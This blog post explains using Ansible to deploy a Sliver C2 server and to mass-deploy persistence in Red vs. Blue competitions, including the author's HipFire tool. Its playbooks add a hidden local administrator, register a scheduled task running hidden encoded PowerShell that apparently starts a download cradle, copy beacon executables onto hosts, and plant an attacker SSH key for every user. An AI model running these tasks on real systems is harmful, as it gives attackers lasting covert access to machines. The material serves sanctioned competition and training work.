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Automation Domination - Using Ansible for Red Team Operations

Updated: at 04:04 AM (14 min read)

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Ansible is a pretty neat utility to keep in every red teamer’s toolkit.

What is Ansible?

Ansible is a tool that does a lot of cool automation stuff. It’s basically a Python wrapper to execute SSH / WinRM commands against multiple hosts, but the commands are written in YAML format to make it super easy to read and understand what’s going on.

The design philosophy of Ansible is to make the configuration as modular as possible as well as reading the code as easy as possible, just like reading documentation.

As a red teamer, we can utilize Ansible to assist with our day-to-day operations, such as automating C2 infrastructure deployment, but can also be used to automatically lay out persistence across multiple teams in a Red vs. Blue (RvB) competition. We’ll explore both use cases in more detail.

How Ansible works in a nutshell

Ansible operates on control nodes and managed nodes, where the control node contains what’s known as a playbook, and managed nodes are the hosts where the Ansible commands are executed. From now on I’ll refer to control nodes as the local machines or local location, while the managed nodes will be referred to as remote machines (because the Ansible docs refer to them as such). But the terms are interchangeable.


Playbooks are YAML files that execute roles on groupings of hosts. When you run a playbook, each item in the playbook gets run in order.

# playbook.yml
# Execute the "install-dependencies" role on all machines underneath the "linux" group
- hosts: linux
    - install-dependencies
  become: yes

# Execute the "win-stuff" and "win-stuff2" roles on all machines underneath the "windows" group
- hosts: windows
    - win-stuff
    - win-stuff2

# Execute the "do-stuff" role on all hosts regardless of group
- hosts: all
    - do-stuff


In a hosts file, you can list out the IP addresses for each group of servers you want to execute tasks on. An example of a hosts file:




You can customize your hosts file to have variables, such as the following variables for WinRM authentication:




Roles are a single or grouping of multiple tasks that achieve some sort of purpose. You can have a role that sets up an Apache web server, a role that installs Docker, or even one that configures a secure Minecraft server.

Roles are configured in a roles directory, which a simple example can be found below:


Each directory underneath roles is considered an individual role. So the above example would contain the install-dependencies role and the kali-tooling role.

At the very least, a role must contain a tasks directory, which must contain a file called main.yml.


Tasks define the modules, or actions, performed on remote hosts. For example, here’s a YAML file that installs some dependencies, increases the git size, and runs pipx ensurepath.

# This is a module that deals with apt
- name: Update apt cache
    update_cache: yes

- name: Install dependencies
      - git
      - python3-pip
      - pipx
      - rustc
      - python3-setuptools
      - mingw-w64
    state: present

# This is a module that runs a command
- name: Increase git size
  command: git config --global http.postBuffer 524288000

- name: Ensure pipx path
  command: pipx ensurepath

There’s a lot more to Ansible, including dealing with variables, using custom modules/plugins, as well as interacting with cloud stuff like AWS, but we won’t cover those topics here.

Deploying red team infrastructure

Most modern red teams will have some way to automatically deploy red team infrastructure with C2 servers, domain fronting, redirectors, phishing servers, and more from a single playbook. Ansible can be used in conjunction with tools like Terraform and Vagrant, which all fit nicely with cloud services like AWS, to build out those instances and configure the necessary tooling. Here’s a really good read that just does that.

However, the scope of one of my projects was way smaller. In my kali-on-command repository, I’ve made a collection of roles that perform basic housekeeping of a Kali installation, such as downloading ThePorgs’ Impacket, NetExec, Ghostpack binaries, as well as Sliver.

While its main purpose was to install common tooling onto Kali jumpboxes for Red vs. Blue competition environments, I’ve added roles that configures basic C2 infrastructure like Sliver. While not the fanciest tool in the block, it gets the job done.

Here’s an example of a Sliver server installation role that downloads the sliver-server binary, generates a configuration file, retrieves the configuration file from the remote server, and configures Sliver to start as a service:

- name: Make new directory for sliver
    path: /opt/sliver
    state: directory

- name: Obtain Sliver release information from GitHub API
    url: ""
    method: GET
    return_content: true
  register: release_info

- name: Extract Sliver server download URL
    asset_url: "{{ item.browser_download_url }}"
  loop: "{{ release_info.json.assets }}"
  when: == "sliver-server_linux"

- name: Download Sliver server binary
    url: "{{ asset_url }}"
    dest: /opt/sliver/sliver-server
    mode: a+x

- name: Generating Sliver configs
  command: "/opt/sliver/sliver-server operator --name {{ config_name }} --lhost {{ hostvars[inventory_hostname]['ansible_default_ipv4']['address'] }} --save /opt/sliver/sliver-teamserver.cfg"
  ignore_errors: true

- name: Fetch Sliver config
    src: /opt/sliver/sliver-teamserver.cfg
    dest: /opt/sliver/
    flat: true

- name: Create service file
    path: /etc/systemd/system/sliver.service
    state: touch

- name: Create sliver service
    path: /etc/systemd/system/sliver.service
    block: |

      ExecStart=/opt/sliver/sliver-server daemon


- name: Start sliver service
    - name: Reload daemon
      command: systemctl daemon-reload

    - name: Enable service
      command: systemctl enable sliver.service

    - name: Start service
      command: systemctl start sliver.service
      register: output

    - name: Print output
      debug: msg="{{ output }}"

Leveraging Ansible to automate C2 deployment makes it incredibly easy to set up competition infrastructure, especially during crunch time. However, it does take a while to create the Ansible roles and test for bugs, so I’d recommend to ensure that a working playbook is at hand before engaging in infrastructure setup.

It’s also really satisfying to see the deployment take action.

Auto-pwnage in Red vs. Blue competitions

Ansible can also be used as an “auto-pwn” script of sorts for a Red vs. Blue competition, due to its ability to perform configurations on multiple hosts in parallel. This makes it especially useful during Red vs. Blue where a red teamer wants to repeat the same attack across multiple teams.

I drew lots of inspiration from CptOfEvilMinions’s GitHub repo, as well as his blog post, where he talked about some of the setup he does with Ansible for his version of Red vs. Blue.

One of the ways we get initial access into machines in Red vs. Blue is through Psexec or WinRM using default credentials (at least for Windows), and usually those default credentials land us in a high-privileged user. Having elevated permissions on Windows grants us multiple ways to establish persistence, as as creating a new Domain Admin or creating scheduled tasks, but also allows us to weaken systems such as disabling Defender or UAC.

Performing those actions repeatedly across multiple teams couldn’t be easier when using Ansible.

Conveniently as well, Ansible leverages WinRM to connect to Windows hosts and provides modules for modules like creating new users or scheduled tasks. Here’s an example:

  - name: Create a new local Administrator
    win_shell: |
      net user niko Password123! /add
      net localgroup Administrators niko /add
  ignore_errors: true

  - name: Create scheduled task
      name: 'Updater'
      - path: powershell.exe
        arguments: "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHc..."
      - type: registration # when task is registered, run every 5 ninutes
          interval: PT5M
    ignore_errors: true

We can run basically any command we want with the win_command module:

- name: Run whatever command
  win_command: whoami /all

If we wanted to transfer our beacon from local to remote, we can use the win_copy module:

- name: Deliver binary
    src: beacon_x64.exe
    dest: 'C:\Windows\Temp'

TLDR - as much as you can configure systems, you can also misconfigure them in the same way.

However, the issue with using Ansible for Red vs. Blue red team operations is that it takes way too long to set Ansible, especially if you are newer to Ansible.

You can have a prepared listing of tasks ready to execute, as well as malware ready to deliver to remote hosts, but setting up the hosts file can be cumbersome and figuring out which Ansible flags to use can make your red teaming session be more of a troubleshooting session.

In a situation where time is of the essence, red teamers don’t have the luxury to really think about Ansible configuration. We’d rather run stuff and pop shells right off the bat.

That leads me to my next set of Ansible tooling - HipFire.

Introducing HipFire

HipFire is a tool to quickly deploy binaries and gain persistence to blue team environments through Ansible, usually using highly-privileged default credentials.

usage: [-h] (-r RANGE | -f FILE) [-w WIN_HOSTS] [-l LIN_HOSTS] -a ACTION [--playbook PLAYBOOK] [--edit-vars EDIT_VARS] [--create-file CREATE_FILE]

  -h, --help            show this help message and exit
  -r RANGE, --range RANGE
                        specify range of hosts
  -f FILE, --file FILE  specify path to hosts file
  -a ACTION, --action ACTION
                        action to take
  --playbook PLAYBOOK   path to playbook.yml file (default=playbook.yml)
  --edit-vars EDIT_VARS
                        vars to edit, e.g. lin.lin_user:root
  --create-file CREATE_FILE
                        filename to write inventory to if --create is used (default=hosts)

  -w WIN_HOSTS, --win-hosts WIN_HOSTS
                        comma-separated 4th octets of Windows hosts
  -l LIN_HOSTS, --lin-hosts LIN_HOSTS
                        comma-separated 4th octets of Linux hosts

The generic usage can be found on the README, but I’ll speak a bit more about the thoughts behind some of the features that the tool offers.

The main thing I wanted to achieve with this tool is the ease-of-use. I wanted the tool to have as little configuration as possible in order to run, assuming that tasks are prepped beforehand to do whatever you want on blue teamers’ machines.

For starters, it incorporates one of my other tools, subknitter, to quickly generate a listing of IPs where the 3rd octet would range between two numbers and the 4th octet would stay the same. This is useful in typical Red vs. Blue networks where you want to specify the same machine (4th octet) but against different teams (3rd octet), and don’t want to write a temporary, janky Bash script to do so. You’d specify the broader IP range with -r or --range and the Windows/Linux hosts by their 4th octet with the -w/--win-hosts and/or -l/--lin-hosts, respectively.

Once the listing of IPs is generated, it writes that into a hosts file, along with some other connection variables for things like SSH and WinRM that reference the vars.yml file. This vars.yml file contains things like beacon filenames, credential information for new user persistence, etc., and should be one of the only files that you have to edit at all.

You can then choose to run an Ansible playbook and execute the tasks against the hosts, or just create the hosts file and leave it as that. To execute the playbook, you’d set the --action or -a flag to fire, while creating the hosts file is just -a create. You can even specify a filename for the new hosts file with the --create-file option if the create action is selected.

With -a set to fire, HipFire runs the provided Ansible playbook called playbook.yml, which should be sufficient enough for most Red vs. Blue use cases (which is to run stuff on Windows then run stuff on Linux). If you want to have more separation between tasks and hosts (e.g. running specific set of tasks on web servers for web-related attacks) then you can modify playbook.yml or make a new playbook and specify the new playbook with the --playbook flag.

Last but not least I’ve added an --edit-vars flag for quick modifications of Ansible variables before playbook execution. For example, if you wanted to change the username of your persistence user, then you can specify --edit-vars 'win.win_user:jesse' in-line without directly modifying the vars.yml file. This will take precedence over any configurations made to vars.yml as well. You can look at the vars.yml file to get an idea of what variables are being passed into the Python script.

The provided playbook.yml runs tasks within the linux and windows roles. I’ve included some starter tasks that perform some simple persistence techniques, such as distributing SSH keys to all users on a Linux system or creating a scheduled task on Windows.

I tried to write these tasks in the spirit of Ansible by avoiding using shell commands as possible and using Ansible’s built-in functionality wherever I could. It can start to get a bit thick in the woods with loops and dealing with special functions but in a way it’s kind of elegant and also more readable than a Bash script.

# Sample Task 2: Distribute SSH key to users
- name: Distribute SSH public key
    - name: Get SSH public key content
        ssh_key_content: "{{ lookup('file', lin.sshkey_filename) }}"
      ignore_errors: true

    - name: Add SSH keys to root user
        path: /root/.ssh/authorized_keys
        line: "{{ ssh_key_content }}"
        create: true
        mode: "0600"
      ignore_errors: true

    - name: Get a list of all users
        database: passwd
      register: users
      ignore_errors: true

    - name: Create .ssh directory for each user
        path: "/home/{{ item.key }}/.ssh"
        state: directory
        owner: "{{ item.key }}"
        mode: "0700"
      loop: "{{ lookup('dict', users.ansible_facts.getent_passwd) }}"
        - item.key != 'root'
        - item.value[1] >= '1000'
        - item.value[4] | regex_search('^/home/')
      ignore_errors: true

    - name: Create authorized_keys file for each valid user
        path: "/home/{{ item.key }}/.ssh/authorized_keys"
        state: touch
        mode: "0600"
      loop: "{{ lookup('dict', users.ansible_facts.getent_passwd) }}"
        - item.key != 'root'
        - item.value[1] >= '1000'
        - item.value[4] | regex_search('^/home/')
      ignore_errors: true

    - name: Write SSH public key into authorized_keys file for each valid user
        path: "/home/{{ item.key }}/.ssh/authorized_keys"
        line: "{{ ssh_key_content }}"
        owner: "{{ item.key }}"
        mode: "0600"
      loop: "{{ lookup('dict', users.ansible_facts.getent_passwd) }}"
        - item.key != 'root'
        - item.value[1] >= '1000'
        - item.value[4] | regex_search('^/home/')
      ignore_errors: true

You must add your own Ansible tasks for any other persistence mechanisms/techniques you want to use in an Red vs. Blue engagement. The simplest way to do so is by using Ansible’s win_command or command modules (for Windows and Linux, respectively):

# Executing a command on Windows
- name: Run a Windows command
    cmd: whoami /all

# Executing a command on Linux
- name: Run a Linux command
    cmd: whoami

For any more complex commands, you may have to do some voodoo magic with different Ansible modules.

Example usage of HipFire

Let’s say we have a scenario where:

As normal, we set up our C2 infrastructure and prepare our payloads. Let’s call them apollo.exe and merlin for our Windows and Linux payloads respectively. We copy our apollo.exe into roles/windows/files and our merlin into roles/linux/files. We also create a new SSH key called id_rsa to distribute to all blue teams’ Linux boxes and copy the into the roles/linux/files directory.

Let’s edit the vars.yml file with the username/password of the user we want to add as persistence into the environment. We should add the filenames of our beacons, apollo.exe and merlin, and the name of our SSH key,, to the file as well.

Our vars.yml can look like something below for now:

  # Linux - Tasks variables
  lin_user: freddy
  lin_pass: Sup3rS3cr3tPass!
  beacon_filename: merlin
  payload_dest: /opt
  # Windows- Tasks variables
  win_user: freddy
  win_pass: Sup3rS3cr3tPass!
  beacon_filename: apollo.exe
  payload_dest: C:\Windows\Temp

Now we must obtain some sort of administrative default credential into the environment - that can be from OSINT on the blue team briefing packet, or discovered quickly on the environment (assuming that the environment is created accordingly, hopefully). Once we obtain those creds, we can plug them into our vars.yml file as well.

Let’s say that the default administrative creds were something like root:NiceToMeetYou! for Linux and Administrator:NiceToMeetYou! for Windows. Let’s add those to our vars.yml file:

  ansible_user: root
  ansible_password: NiceToMeetYou!
  ansible_sudo_pass: NiceToMeetYou!
  # Linux - Tasks variables
  lin_user: freddy
  lin_pass: Sup3rS3cr3tPass!
  beacon_filename: merlin
  payload_dest: /opt
  ansible_user: Administrator
  ansible_password: NiceToMeetYou!
  # Windows - Tasks variables
  win_user: freddy
  win_pass: Sup3rS3cr3tPass!
  beacon_filename: apollo.exe
  payload_dest: C:\Windows\Temp

Nice! We’re almost done. All that’s left is to run HipFire with the following flags:

python3 -r 10.100.101-108 -w 2,3 -l 4,5 -a fire


Then HipFire should be firing!

Note that sometimes the connection times out for no reason or blue teamers firewall off WinRM super quickly, so it might not be 100% consistent in practice. However it should still be a super nice utility for red teamers to focus more on more complex exploits or creating some sort of impact (e.g. turning off services).
